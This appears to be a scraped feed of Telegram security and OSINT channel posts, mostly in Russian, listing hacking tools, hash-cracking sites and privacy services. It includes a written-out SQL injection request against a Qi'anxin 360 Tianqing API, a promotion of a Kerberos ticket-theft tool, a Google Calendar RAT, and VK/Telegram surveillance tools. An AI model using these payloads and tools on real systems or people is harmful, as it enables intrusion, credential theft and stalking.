https://github.com/actuator/Android-Security-Exploits-YouTube-Curriculum
Android Security & Reverse Engineering YouTube Curriculum
#github
Android Security & Reverse Engineering YouTube Curriculum
#github
GitHub
GitHub - actuator/Android-Security-Exploits-YouTube-Curriculum: 🔓A Curated List Of Modern Android Exploitation Conference Talks.
🔓A Curated List Of Modern Android Exploitation Conference Talks. - actuator/Android-Security-Exploits-YouTube-Curriculum
Qi'anxin 360 Tianqing get similar list SQL injection vulnerability
GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
SANDBOX / EMULATOR
Disposable Secure Browser or Desktop https://kasmweb.com/
Bluestacks https://www.bluestacks.com/
Genymotion https://www.genymotion.com/
PrimeOS https://www.primeos.in/
BigNox https://www.bignox.com/
Memuplay.com https://www.memuplay.com/
Ldplayer.net https://www.ldplayer.net/
Disposable Secure Browser or Desktop https://kasmweb.com/
Bluestacks https://www.bluestacks.com/
Genymotion https://www.genymotion.com/
PrimeOS https://www.primeos.in/
BigNox https://www.bignox.com/
Memuplay.com https://www.memuplay.com/
Ldplayer.net https://www.ldplayer.net/
Kasm
Kasm Workspaces | The Container Streaming Platform
Kasm Workspaces delivers zero-trust remote browser isolation, Desktop as a Service (DaaS), and OSINT workloads to your web browser.
🔧HASH RECOVERY
CrackStation https://crackstation.net
Hashmob Community https://hashmob.net/search
Hashes.com https://hashes.com/en/decrypt/hash
Online Password Hash Crack https://www.onlinehashcrack.com/
Md5 Decrypt & Encrypt https://md5decrypt.net/en/
MD5 reverse lookup https://md5.gromweb.com/
Ultimate Hashing https://md5hashing.net/
Hashes.org https://hashes.org/search.php
⬇️DOWNLOADER
Media-downloader.net https://media-downloader.net/
Imgur Album Downloader https://dschep.github.io/imgur-album-downloader/#/
Export Comments https://exportcomments.com/
Image Extractor https://extract.pics/
Loader.to https://loader.to/
Commentexporter.com https://www.commentexporter.com/
Link Gopher https://sites.google.com/site/linkgopher/
Page Links Extractor Tool https://shadowcrypt.net/tools/pagelinks
Online Tool to Extract Links from any Web Page https://hackertarget.com/extract-links/
CrackStation https://crackstation.net
Hashmob Community https://hashmob.net/search
Hashes.com https://hashes.com/en/decrypt/hash
Online Password Hash Crack https://www.onlinehashcrack.com/
Md5 Decrypt & Encrypt https://md5decrypt.net/en/
MD5 reverse lookup https://md5.gromweb.com/
Ultimate Hashing https://md5hashing.net/
Hashes.org https://hashes.org/search.php
⬇️DOWNLOADER
Media-downloader.net https://media-downloader.net/
Imgur Album Downloader https://dschep.github.io/imgur-album-downloader/#/
Export Comments https://exportcomments.com/
Image Extractor https://extract.pics/
Loader.to https://loader.to/
Commentexporter.com https://www.commentexporter.com/
Link Gopher https://sites.google.com/site/linkgopher/
Page Links Extractor Tool https://shadowcrypt.net/tools/pagelinks
Online Tool to Extract Links from any Web Page https://hackertarget.com/extract-links/
crackstation.net
CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.
Crackstation is the most effective hash cracking service. We crack: MD5, SHA1, SHA2, WPA, and much more...
🔥 Bitrix24 Multiple Vulnerabilities
Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.
🌐 Details and PoC's:
🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)
#bitrix24 #rce #xss #dos #idor
Multiple high-risk vulnerabilities found in Bitrix24 v22.0.300. These include Remote Command Execution, Cross-Site Scripting, Prototype Pollution, Insecure File Access, and Denial of Service.
🌐 Details and PoC's:
🔗 CVE-2023-1713 (RCE)
🔗 CVE-2023-1714 (RCE)
🔗 CVE-2023-1715 (XSS)
🔗 CVE-2023-1717 (XSS)
🔗 CVE-2023-1718 (DoS)
🔗 CVE-2023-1719 (IDOR)
#bitrix24 #rce #xss #dos #idor
🔎 TorBot
TorBot - это интеллектуальный инструмент Osint с открытым исходным кодом, разработанный на Python.
Основная цель этого проекта - собрать открытые данные из даркнета и с помощью алгоритмов интеллектуального анализа создать интерактивную древовидную диаграмму.
⏺ Ссылка на GitHub
#OSINT #Python
TorBot - это интеллектуальный инструмент Osint с открытым исходным кодом, разработанный на Python.
Основная цель этого проекта - собрать открытые данные из даркнета и с помощью алгоритмов интеллектуального анализа создать интерактивную древовидную диаграмму.
⏺ Ссылка на GitHub
#OSINT #Python
Forwarded from RedTeam brazzers (Миша)
tgsthief.png
185.6 KB
Буквально на днях вышел один интересный проект GIUDA , который позволяет злоупотреблять сессиями еще одним способом! Представим ситуацию, что у нас есть ЛА на машине, на которую изредка ходит ДА. С помощью этого инструмента можно будет, зная лишь идентификатор логон сессии ДА, запросить TGS на любую службу от его имени. Да, даже не нужно знать его пароля, лезть в LSASS, красть токен, внедряться в процесс и тому подобное и прочее.
Достаточно только LUID👀
Казалось бы, все круто, но проект написан на Pascal😳 (паскаль, лол, мы на нем в школе только писали).
Поэтому я принял решение переписать инструмент на C++, добавив пару фишек:
1. Во-первых, никаких десятков запусков (та тулза требовала, чтобы сначала запустить ее от системы, потом второй раз запустить для перечисления LUID, потом с этим LUID снова запустить, уже указав SPN, тьфу.....) . Один запуск, и TGS в кармане. Мой инструмент автоматически повысится до системы, перечислит LUID (ты должен просто отдать нужный номер logon сессии, из которой нужно запросить TGS), а затем ввести SPN. И все. Готово :000
2. Добавил вывод тикета в base64 и опциональный инжект в логон сессию, из которой был запущен инструмент
3. Из-за моих прямых рук часто криво вводил SPN, добавил валидацию SPN по regex. Дополнительно SPN можно валидировать через InitializeSecurityContext , как я это делал в TGT Delegation .
Итак, прошу любить и жаловать!🥰
https://github.com/MzHmO/TGSThief
Достаточно только LUID
Казалось бы, все круто, но проект написан на Pascal
Поэтому я принял решение переписать инструмент на C++, добавив пару фишек:
1. Во-первых, никаких десятков запусков (та тулза требовала, чтобы сначала запустить ее от системы, потом второй раз запустить для перечисления LUID, потом с этим LUID снова запустить, уже указав SPN, тьфу.....) . Один запуск, и TGS в кармане. Мой инструмент автоматически повысится до системы, перечислит LUID (ты должен просто отдать нужный номер logon сессии, из которой нужно запросить TGS), а затем ввести SPN. И все. Готово :000
2. Добавил вывод тикета в base64 и опциональный инжект в логон сессию, из которой был запущен инструмент
3. Из-за моих прямых рук часто криво вводил SPN, добавил валидацию SPN по regex. Дополнительно SPN можно валидировать через InitializeSecurityContext , как я это делал в TGT Delegation .
Итак, прошу любить и жаловать!
https://github.com/MzHmO/TGSThief
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
⚛️ Nuclei AI — Browser Extension
Nuclei AI Browser Extension, built on top of cloud.projectdiscovery.io, simplifies the creation of vulnerability templates, by enabling users to extract vulnerability information from any webpages to quickly and efficiently create nuclei templates, saving valuable time and effort.
🚀 Features
— Context Menu Option to Generate Template
— HackerOne Report to Nuclei Template Generation
— ExploitDB exploit to Nuclei Template Generation
— BugCrowd / Intigriti / Synack support (Coming soon)
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #template #generator #chrome #extension
Nuclei AI Browser Extension, built on top of cloud.projectdiscovery.io, simplifies the creation of vulnerability templates, by enabling users to extract vulnerability information from any webpages to quickly and efficiently create nuclei templates, saving valuable time and effort.
🚀 Features
— Context Menu Option to Generate Template
— HackerOne Report to Nuclei Template Generation
— ExploitDB exploit to Nuclei Template Generation
— BugCrowd / Intigriti / Synack support (Coming soon)
🔗 https://github.com/projectdiscovery/nuclei-ai-extension
#nuclei #template #generator #chrome #extension
🔥2👍1
Skiff — сервис, предоставляющий услуги:
— Почтового ящика со сквозным шифрованием писем;
— Зашифрованных заметок, документов и календаря;
— Облачного хранения файлов (до 10 GB бесплатно);
У сервиса есть бесплатный и 3 платных тарифа. Самый дорогой — 12$/мес, включает в себя 1 TB хранилища и 15 почтовых алиасов.
#сайт #сервис #приватность
— Почтового ящика со сквозным шифрованием писем;
— Зашифрованных заметок, документов и календаря;
— Облачного хранения файлов (до 10 GB бесплатно);
У сервиса есть бесплатный и 3 платных тарифа. Самый дорогой — 12$/мес, включает в себя 1 TB хранилища и 15 почтовых алиасов.
#сайт #сервис #приватность
👍1
TypingDNA ActiveLock — утилита, которая блокирует информацию на вашем ПК, полагаясь на стиль набора текста. Само собой, AI-powered.
Менее чем за 200 нажатий по клавиатуре, ActiveLock понимает, что текст вводит не владелец ПК.
Разумеется, перед этим его нужно обучить, напечатав минимум 2000 слов.
#софт #сайт #приватность #ИИ
Менее чем за 200 нажатий по клавиатуре, ActiveLock понимает, что текст вводит не владелец ПК.
Разумеется, перед этим его нужно обучить, напечатав минимум 2000 слов.
#софт #сайт #приватность #ИИ
Используем блага нейросетей. Часть 18.
1. Blazing Fast — сделает .pptx презентацию под ваш запрос за несколько минут;
2. Ideogram — генерирует картинки без сложных промтов, бесплатная;
3. patterns — создаст любой веб-дизайн по простому текстовому запросу;
4. gling — удаляет слова-паразиты, паузы и случайные звуки из видеороликов;
5. Merlin — расширение для браузера, запускает GPT на любой странице;
6. AnimateDiff — он добавляет к картинке движение и прочие детали.
7. ProductAI — AI-сервис для генерации ярких и запоминающихся фото товаров;
8. Pros 'n Cons — распишет плюсы и минусы при принятии решений.
#ИИ #сайт #сервис
1. Blazing Fast — сделает .pptx презентацию под ваш запрос за несколько минут;
2. Ideogram — генерирует картинки без сложных промтов, бесплатная;
3. patterns — создаст любой веб-дизайн по простому текстовому запросу;
4. gling — удаляет слова-паразиты, паузы и случайные звуки из видеороликов;
5. Merlin — расширение для браузера, запускает GPT на любой странице;
6. AnimateDiff — он добавляет к картинке движение и прочие детали.
7. ProductAI — AI-сервис для генерации ярких и запоминающихся фото товаров;
8. Pros 'n Cons — распишет плюсы и минусы при принятии решений.
#ИИ #сайт #сервис
🔥2
Как узнать с кем и сколько переписывается пользователь ВК
VKDia предоставляет «слежку» за статусом пользователя («в сети») и сопоставляет её с друзьями цели или другим пользователем, которого вы выбрали.
Если люди подозрительно часто находятся в сети в одно и то же время (особенно если речь идёт про ночные часы и короткие промежутки онлайна) – они, скорее всего, переписываются.
VKDia предоставляет «слежку» за статусом пользователя («в сети») и сопоставляет её с друзьями цели или другим пользователем, которого вы выбрали.
Если люди подозрительно часто находятся в сети в одно и то же время (особенно если речь идёт про ночные часы и короткие промежутки онлайна) – они, скорее всего, переписываются.
Обширный анализ Телеграма
Telecron, в отличии от ранее упомянутого TEx, предоставляет не только функции скрепинга информации о Телеграм каналах или чатах, но и…
- анализ/визуализацию связей между пользователями
- экстракцию ключевых фраз/слов из сообщений пользователя
- выгрузка сущностей («энтити»)
- поиск геометок
Полная документация доступна на гитхабе
Telecron, в отличии от ранее упомянутого TEx, предоставляет не только функции скрепинга информации о Телеграм каналах или чатах, но и…
- анализ/визуализацию связей между пользователями
- экстракцию ключевых фраз/слов из сообщений пользователя
- выгрузка сущностей («энтити»)
- поиск геометок
Полная документация доступна на гитхабе
🔥1
͏Исследователи из Лаборатории Касперского выкатили настоящий must have для инфосек-сообщества.
Почти энциклопедический гайд по TTPs азиатских APT-групп с отличной классификацией большого объема данных по акторам и атакам поможет специалистам четко ориентироваться в теме и эффективно выстроить защиту от соответствующих угроз.
Но для этого исследователям ЛК пришлось проделать достаточно глубочайшую аналитическую работу, проштудировав сотни инцидентов по всему миру за 2022-2023 гг.
В результате чего, несмотря на огромное количество атак и технических деталей, им удалось выявить ограниченный спектр используемых техник и нащупать общий «почерк».
В своем аналитическом отчете на 370 страниц специалисты делятся наиболее ценными разведданными, собранными по азиатским АРТ, которые будут востребованы, прежде всего, на практике в плане эффективного противодействия.
Результаты аналитики по TTPs каждого из этапов атак позволили исследователям сформулировать достаточно четкие и эффективные рекомендации по борьбе с ними, включая Sigma-правила для детектирования в инфраструктуре.
Полная версия отчёта: https://kas.pr/ru-apt-report-2023.
Почти энциклопедический гайд по TTPs азиатских APT-групп с отличной классификацией большого объема данных по акторам и атакам поможет специалистам четко ориентироваться в теме и эффективно выстроить защиту от соответствующих угроз.
Но для этого исследователям ЛК пришлось проделать достаточно глубочайшую аналитическую работу, проштудировав сотни инцидентов по всему миру за 2022-2023 гг.
В результате чего, несмотря на огромное количество атак и технических деталей, им удалось выявить ограниченный спектр используемых техник и нащупать общий «почерк».
В своем аналитическом отчете на 370 страниц специалисты делятся наиболее ценными разведданными, собранными по азиатским АРТ, которые будут востребованы, прежде всего, на практике в плане эффективного противодействия.
Результаты аналитики по TTPs каждого из этапов атак позволили исследователям сформулировать достаточно четкие и эффективные рекомендации по борьбе с ними, включая Sigma-правила для детектирования в инфраструктуре.
Полная версия отчёта: https://kas.pr/ru-apt-report-2023.
👍1
Russias Corporate Soldiers The Global Expansion of Russias.pdf
10.6 MB
🇷🇺🇺🇸Свежий документ от аналитиков CSIS "Российские корпоративные солдаты. Глобальная экспансия ЧВК России" (Russia’s Corporate Soldiers: The Global Expansion of Russia’s Private Military Companies).
Краткий анализ документа можно найти у наших друзей из @osint13😉
#США #Россия
Краткий анализ документа можно найти у наших друзей из @osint13😉
#США #Россия
👍1
GCR-Google-Calendar-RAT.zip
23 KB
#GCR - Google Calendar RAT
https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
Google Calendar RAT is a PoC of Command&Control (C2) over Google Calendar Events, This tool has been developed for those circumstances where it is difficult to create an entire red teaming infrastructure. To use GRC, only a Gmail account is required. The script creates a 'Covert Channel' by exploiting the event descriptions in Google Calendar. The target will connect directly to Google." It could be considered as a layer 7 application Covert Channel
https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
Google Calendar RAT is a PoC of Command&Control (C2) over Google Calendar Events, This tool has been developed for those circumstances where it is difficult to create an entire red teaming infrastructure. To use GRC, only a Gmail account is required. The script creates a 'Covert Channel' by exploiting the event descriptions in Google Calendar. The target will connect directly to Google." It could be considered as a layer 7 application Covert Channel